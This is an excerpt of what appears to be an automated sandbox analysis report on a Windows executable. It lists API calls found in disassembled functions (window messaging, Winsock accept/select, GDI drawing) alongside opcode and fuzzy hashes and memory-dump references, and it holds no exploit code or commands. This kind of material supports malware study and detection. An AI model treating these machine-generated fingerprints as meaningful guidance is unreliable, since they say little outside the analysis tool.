                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1792727568-0
                                                                                                                                                                                                                                                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                                                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                            • Opcode ID: 08dcd2e5386a87cad46f4510cadd52763bceb9adb2884f8b63ead6fb3e0fdbd4
                                                                                                                                                                                                                                                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08dcd2e5386a87cad46f4510cadd52763bceb9adb2884f8b63ead6fb3e0fdbd4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                                                                                                                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                                                                                                                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                            • API String ID: 3850814276-3896280584
                                                                                                                                                                                                                                                            • Opcode ID: 9e010991f0c4b9109715b632163dccb7fe982870f61429f5b7380d262220bbc2
                                                                                                                                                                                                                                                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e010991f0c4b9109715b632163dccb7fe982870f61429f5b7380d262220bbc2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 00448C69
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                                                                                                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                                                                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 385091864-0
                                                                                                                                                                                                                                                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                                                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
• Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
• GetStockObject.GDI32(00000011), ref: 00430258
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
• ShowWindow.USER32(00000000,00000000), ref: 0043027D
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
• Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
• Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
• Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
• Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
• Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
• Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
• Opcode ID: 0730b6623b1383e20fe13541dc72d1ba8975e1512efcb7382885d51de004be2c
• Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
• Opcode Fuzzy Hash: 0730b6623b1383e20fe13541dc72d1ba8975e1512efcb7382885d51de004be2c
• Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
• Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
• Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
• Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
• Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2783949968-0
                                                                                                                                                                                                                                                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                                                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                                                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
